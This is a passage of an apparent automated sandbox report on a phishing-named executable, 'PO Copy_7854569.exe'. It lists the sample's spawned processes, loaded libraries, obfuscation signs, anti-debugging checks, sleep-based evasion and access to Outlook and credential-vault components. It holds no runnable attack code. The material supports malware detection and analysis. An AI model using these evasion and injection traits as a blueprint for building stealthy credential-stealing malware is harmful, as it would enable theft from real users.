            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Process created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Process created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
            Source: C:\Windows\SysWOW64\openfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
            Source: C:\Windows\SysWOW64\openfiles.exe Section loaded: mpr.dll, framedynos.dll, version.dll, srvcli.dll, netutils.dll, sspicli.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, userenv.dll, winhttp.dll, wkscli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\openfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PO Copy_7854569.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO Copy_7854569.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: OpnFiles.pdb source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000003.2528143516.000000000069B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000002.4439886342.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000000.2205683578.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO Copy_7854569.exe, 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2141673668.000000000469F000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2120507310.00000000044EB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO Copy_7854569.exe, PO Copy_7854569.exe, 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000008.00000003.2141673668.000000000469F000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2120507310.00000000044EB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: OpnFiles.pdbGCTL source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000003.2528143516.000000000069B000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            Source: PO Copy_7854569.exe, GameOfLife.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: PO Copy_7854569.exe, GameOfLife.cs .Net Code: InitializeComponent contains xor as well as GetObject
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack, sAQsu8yt6lLQbnQvsb.cs .Net Code: gvJ09pWBa8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO Copy_7854569.exe.31f6410.4.raw.unpack, LoginForm.cs .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO Copy_7854569.exe.7560000.9.raw.unpack, LoginForm.cs .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack, sAQsu8yt6lLQbnQvsb.cs .Net Code: gvJ09pWBa8 System.Reflection.Assembly.Load(byte[])
            Source: 8.2.openfiles.exe.4e7cd08.2.raw.unpack, GameOfLife.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 8.2.openfiles.exe.4e7cd08.2.raw.unpack, GameOfLife.cs .Net Code: InitializeComponent contains xor as well as GetObject
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00413F07 push 2F12636Bh; retf 6_2_00413F68
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00407043 push esp; ret 6_2_00407044
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00414087 push esi; ret 6_2_0041411F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00417891 push esi; ret 6_2_00417892
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_004140BC push esi; ret 6_2_0041411F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00414121 push esi; ret 6_2_0041411F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00402139 pushad ; ret 6_2_0040214B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_0042CAC3 pushfd ; retf 6_2_0042CAFE
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00405BED push ebp; retf 6_2_00405BF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_0041DC6B push esi; iretd 6_2_0041DC74
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00403410 push eax; ret 6_2_00403412
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_0040743D push ebx; retf 6_2_00407445
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00417515 push ebx; ret 6_2_0041751C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00411D3F push es; retf 6_2_00411D46
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00413EA9 push edx; retf 6_2_00413EAA
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_0160225F pushad ; ret 6_2_016027F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_016027FA pushad ; ret 6_2_016027F9
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_016309AD push ecx; mov dword ptr [esp], ecx 6_2_016309B6
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_0160283D push eax; iretd 6_2_01602858
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_01601328 push eax; iretd 6_2_01601369
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_0388EBBA push esp; ret 7_2_0388EBBB
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_038A61BB push ebp; retf 7_2_038A61BC
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_0389F08C push ebx; ret 7_2_0389F093
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_038998B6 push es; retf 7_2_038998BD
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_03810000 push esp; retf 7_2_03810001
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_0388EFB4 push ebx; retf 7_2_0388EFBC
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_038A57E2 push esi; iretd 7_2_038A57EB
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_0388D764 push ebp; retf 7_2_0388D767
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_038B463A pushfd ; retf 7_2_038B4675
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_038A65C4 push D4A4F74Ah; ret 7_2_038A65CB
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe Code function: 7_2_038A64DD push ss; ret 7_2_038A64DE
            Source: PO Copy_7854569.exe Static PE information: section name: .text entropy: 7.965905089311066
            Source: 0.2.PO Copy_7854569.exe.7ef0000.11.raw.unpack High entropy of concatenated method names
            Source: 0.2.PO Copy_7854569.exe.45d2860.7.raw.unpack High entropy of concatenated method names

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\openfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: PO Copy_7854569.exe PID: 3648, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Memory allocated: 16B0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Memory allocated: 31D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Memory allocated: 3100000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Memory allocated: 7F80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Memory allocated: 8F80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Memory allocated: 9230000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Memory allocated: A230000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_0167096E rdtsc 6_2_0167096E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5799
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2516
            Source: C:\Windows\SysWOW64\openfiles.exe Window / User API: threadDelayed 9800
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\openfiles.exe API coverage: 2.6 %
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe TID: 2212 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6760 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 1632 Thread sleep count: 172 > 30
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 1632 Thread sleep time: -344000s >= -30000s
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 1632 Thread sleep count: 9800 > 30
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 1632 Thread sleep time: -19600000s >= -30000s
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe TID: 7032 Thread sleep time: -90000s >= -30000s
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe TID: 7032 Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe TID: 7032 Thread sleep time: -36000s >= -30000s
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe TID: 7032 Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\openfiles.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 8_2_0282B880 FindFirstFileW, FindNextFileW, FindClose, 8_2_0282B880
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\openfiles.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe Code function: 6_2_00417253 LdrLoadDll, 6_2_00417253
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640535 mov eax, dword ptr fs:[00000030h]6_2_01640535
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E53E mov eax, dword ptr fs:[00000030h]6_2_0165E53E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C6500 mov eax, dword ptr fs:[00000030h]6_2_016C6500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704500 mov eax, dword ptr fs:[00000030h]6_2_01704500
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165E5E7 mov eax, dword ptr fs:[00000030h]6_2_0165E5E7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016325E0 mov eax, dword ptr fs:[00000030h]6_2_016325E0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C5ED mov eax, dword ptr fs:[00000030h]6_2_0166C5ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166C5ED mov eax, dword ptr fs:[00000030h]6_2_0166C5ED
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E5CF mov eax, dword ptr fs:[00000030h]6_2_0166E5CF
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E5CF mov eax, dword ptr fs:[00000030h]6_2_0166E5CF
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016365D0 mov eax, dword ptr fs:[00000030h]6_2_016365D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A5D0 mov eax, dword ptr fs:[00000030h]6_2_0166A5D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A5D0 mov eax, dword ptr fs:[00000030h]6_2_0166A5D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B05A7 mov eax, dword ptr fs:[00000030h]6_2_016B05A7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B05A7 mov eax, dword ptr fs:[00000030h]6_2_016B05A7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B05A7 mov eax, dword ptr fs:[00000030h]6_2_016B05A7
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016545B1 mov eax, dword ptr fs:[00000030h]6_2_016545B1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016545B1 mov eax, dword ptr fs:[00000030h]6_2_016545B1
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01632582 mov eax, dword ptr fs:[00000030h]6_2_01632582
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01632582 mov ecx, dword ptr fs:[00000030h]6_2_01632582
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01664588 mov eax, dword ptr fs:[00000030h]6_2_01664588
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E59C mov eax, dword ptr fs:[00000030h]6_2_0166E59C
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BC460 mov ecx, dword ptr fs:[00000030h]6_2_016BC460
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165A470 mov eax, dword ptr fs:[00000030h]6_2_0165A470
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165A470 mov eax, dword ptr fs:[00000030h]6_2_0165A470
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165A470 mov eax, dword ptr fs:[00000030h]6_2_0165A470
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166E443 mov eax, dword ptr fs:[00000030h]6_2_0166E443
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EA456 mov eax, dword ptr fs:[00000030h]6_2_016EA456
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162645D mov eax, dword ptr fs:[00000030h]6_2_0162645D
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165245A mov eax, dword ptr fs:[00000030h]6_2_0165245A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162E420 mov eax, dword ptr fs:[00000030h]6_2_0162E420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162E420 mov eax, dword ptr fs:[00000030h]6_2_0162E420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162E420 mov eax, dword ptr fs:[00000030h]6_2_0162E420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162C427 mov eax, dword ptr fs:[00000030h]6_2_0162C427
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016B6420 mov eax, dword ptr fs:[00000030h]6_2_016B6420
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166A430 mov eax, dword ptr fs:[00000030h]6_2_0166A430
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01668402 mov eax, dword ptr fs:[00000030h]6_2_01668402
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01668402 mov eax, dword ptr fs:[00000030h]6_2_01668402
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01668402 mov eax, dword ptr fs:[00000030h]6_2_01668402
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016304E5 mov ecx, dword ptr fs:[00000030h]6_2_016304E5
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016364AB mov eax, dword ptr fs:[00000030h]6_2_016364AB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016644B0 mov ecx, dword ptr fs:[00000030h]6_2_016644B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BA4B0 mov eax, dword ptr fs:[00000030h]6_2_016BA4B0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016EA49A mov eax, dword ptr fs:[00000030h]6_2_016EA49A
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01638770 mov eax, dword ptr fs:[00000030h]6_2_01638770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640770 mov eax, dword ptr fs:[00000030h]6_2_01640770
